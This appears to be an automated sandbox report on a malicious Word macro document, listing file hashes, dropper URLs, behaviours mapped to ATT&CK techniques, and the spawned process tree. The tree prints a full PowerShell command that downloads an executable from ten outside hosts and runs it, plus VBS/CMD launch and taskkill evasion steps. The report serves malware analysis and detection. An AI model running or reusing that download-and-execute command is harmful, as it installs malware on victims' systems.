a0ab609747b185b820ed3a65ba00934adebd2d12689d4a49c21094ac870ff0f4

General

Target

08142020_1955816493.docm
Size

381KB
MD5

8b9a76bee8f32292b25d55383c100d2c
SHA1

fe63d6a4046682dabce9cc6e49bc22fbbb8399e4
SHA256

a1ea10b25a1dd9165910a6859847f4bc6437f06e4651f8cc31ddf3b9d50be3c2
SHA512

9fc9740134ec8bd07b7f18ce2ab4b52136ebce65ed7d5a62493efceb545ba2a1aedd2217360f933f386716ccb5554a0700aef17949b724e7e301ab6cdaa22d15

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://rijschoolfastandserious.nl/rprmloaw/111111.png

exe.dropper

http://nanfeiqiaowang.com/tsxwe/111111.png

exe.dropper

http://forum.insteon.com/suowb/111111.png

exe.dropper

http://webtest.pp.ua/yksrpucvx/111111.png

exe.dropper

http://quoraforum.com/btmlxjxmyxb/111111.png

exe.dropper

http://quickinsolutions.com/wfqggeott/111111.png

exe.dropper

http://bronco.is/pdniovzkgwwt/111111.png

exe.dropper

http://studiomascellaro.it/wnzzsbzbd/111111.png

exe.dropper

http://craniotylla.ch/vzufnt/111111.png

exe.dropper

http://marineworks.eu/dwaunrsamlbq/111111.png

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

explorer.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	216	3928	explorer.exe	WINWORD.EXE

Blocklisted process makes network request 15 IoCs

Processes:

powershell.exe

flow	pid	process
25	2780	powershell.exe
27	2780	powershell.exe
28	2780	powershell.exe
30	2780	powershell.exe
49	2780	powershell.exe
50	2780	powershell.exe
53	2780	powershell.exe
55	2780	powershell.exe
56	2780	powershell.exe
58	2780	powershell.exe
59	2780	powershell.exe
61	2780	powershell.exe
64	2780	powershell.exe
66	2780	powershell.exe
67	2780	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

5036 timeout.exe

pid	process
5036	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

5112 taskkill.exe
Modifies registry class 1 IoCs

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings explorer.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3928 WINWORD.EXE
3928 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2780 powershell.exe
2780 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

taskkill.exepowershell.exe

description pid process

Token: SeDebugPrivilege 5112 taskkill.exe
Token: SeDebugPrivilege 2780 powershell.exe
Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

WINWORD.EXE

pid process

3928 WINWORD.EXE
3928 WINWORD.EXE
3928 WINWORD.EXE
3928 WINWORD.EXE

pid	process
5112	taskkill.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings	explorer.exe

pid	process
3928	WINWORD.EXE
3928	WINWORD.EXE

pid	process
2780	powershell.exe
2780	powershell.exe

description	pid	process
Token: SeDebugPrivilege	5112	taskkill.exe
Token: SeDebugPrivilege	2780	powershell.exe

pid	process
3928	WINWORD.EXE
3928	WINWORD.EXE
3928	WINWORD.EXE
3928	WINWORD.EXE

Suspicious use of WriteProcessMemory 12 IoCs

Processes:

WINWORD.EXEexplorer.exeWScript.execmd.exe

description	pid	process	target process
PID 3928 wrote to memory of 216	3928	WINWORD.EXE	explorer.exe
PID 3928 wrote to memory of 216	3928	WINWORD.EXE	explorer.exe
PID 2516 wrote to memory of 4356	2516	explorer.exe	WScript.exe
PID 2516 wrote to memory of 4356	2516	explorer.exe	WScript.exe
PID 4356 wrote to memory of 4092	4356	WScript.exe	cmd.exe
PID 4356 wrote to memory of 4092	4356	WScript.exe	cmd.exe
PID 4092 wrote to memory of 5112	4092	cmd.exe	taskkill.exe
PID 4092 wrote to memory of 5112	4092	cmd.exe	taskkill.exe
PID 4092 wrote to memory of 2780	4092	cmd.exe	powershell.exe
PID 4092 wrote to memory of 2780	4092	cmd.exe	powershell.exe
PID 4092 wrote to memory of 5036	4092	cmd.exe	timeout.exe
PID 4092 wrote to memory of 5036	4092	cmd.exe	timeout.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\08142020_1955816493.docm" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3928

C:\Windows\explorer.exe
explorer.exe C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
2⤵
- Process spawned unexpected child process
PID:216

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2516

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4356

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4092

C:\Windows\system32\taskkill.exe
Taskkill /IM "winword.exe" /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POWerShell Foreach($url in @('http://rijschoolfastandserious.nl/rprmloaw/111111.png','http://nanfeiqiaowang.com/tsxwe/111111.png','http://forum.insteon.com/suowb/111111.png','http://webtest.pp.ua/yksrpucvx/111111.png','http://quoraforum.com/btmlxjxmyxb/111111.png','http://quickinsolutions.com/wfqggeott/111111.png','http://bronco.is/pdniovzkgwwt/111111.png','http://studiomascellaro.it/wnzzsbzbd/111111.png','http://craniotylla.ch/vzufnt/111111.png','http://marineworks.eu/dwaunrsamlbq/111111.png')) { try{$path = 'C:\BlotRots\Loterios.exe'; (New-Object Net.WebClient).DownloadFile($url.ToString(), $path);saps $path; break;}catch{write-host $_.Exception.Message}}
4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2780

C:\Windows\system32\timeout.exe
TIMEOUT /T 10
4⤵
- Delays execution with timeout.exe
PID:5036

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

3

T1012

System Information Discovery

4

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\BlotRots\djsfgytdftftyYFGfghffghYYTTT.cmd
Filesize
5KB

MD5
2d63e5c7ff61a560f0cc7dccd0661bf6

SHA1
995efc69bd84b193786de1a993ad7052f14e9542

SHA256
94a12075382cb44133ba8dd51973b583d4c2514f7d3d7414ae4d9a92b5354584

SHA512
94254c0bbbc1c06bc93aeb6264d7d2cdd46ba3ff55fccdc3a669d3d713083a45b9e066a780f5b9684e6b8226c4acaca80df6d61ad5bb1d53c6bb66d9ec2e073c

Download Submit
C:\ProgramData\JHJKGHuggUGUGYYuyggg.vbs
Filesize
68KB

MD5
ad7b09adba59218ce485148faf21dc82

SHA1
0a3851f903f7d928688e5ebeee13f6d5d921b4de

SHA256
214fd312196dd5769f94ed778c50df1eaf49a5c8287c67edcf2fbd05dff02cb2

SHA512
1fb8361f343e174574eae776fae701580c32dcbb6e120e181190bafb80d5968af788d1edb68f1450d6ddbd62f0bc15d8d9c5bcce6187d712a3afe71c57669f4f

Download Submit
C:\ProgramData\UIYUIYUIYuiyuiYUIYYuyty.vbs
Filesize
2KB

MD5
f07e30c22ead3c49606617eb04fbf9c7

SHA1
539dbd8cda2c1e6ada7a02e146c33b5aae7b1099

SHA256
4639cb4ccdef149ef325770ccf4fff658b7cb528d71661113dbfe9e1c683dbf9

SHA512
10f721ecf33fe97d074e2b5dd538ff83527a7db3ac4a0cfda183db9c9a2949dc9dd17361eb89e40e4a9865444c721108e1c4b7525337d83ba533250cb6ab052b

Download Submit
memory/216-138-0x0000000000000000-mapping.dmp

Download
memory/2780-149-0x0000000000000000-mapping.dmp

Download
memory/2780-151-0x00007FFCA7520000-0x00007FFCA7FE1000-memory.dmp

Filesize
10.8MB

Download
memory/2780-150-0x00000153F88A0000-0x00000153F88C2000-memory.dmp

Filesize
136KB

Download
memory/3928-134-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-137-0x000001EAB62C0000-0x000001EAB62C4000-memory.dmp

Filesize
16KB

Download
memory/3928-136-0x00007FFC84500000-0x00007FFC84510000-memory.dmp

Filesize
64KB

Download
memory/3928-135-0x00007FFC84500000-0x00007FFC84510000-memory.dmp

Filesize
64KB

Download
memory/3928-142-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-143-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-145-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-144-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-130-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-133-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-132-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/3928-131-0x00007FFC86D30000-0x00007FFC86D40000-memory.dmp

Filesize
64KB

Download
memory/4092-146-0x0000000000000000-mapping.dmp

Download
memory/4356-141-0x0000000000000000-mapping.dmp

Download
memory/5036-152-0x0000000000000000-mapping.dmp

Download
memory/5112-148-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads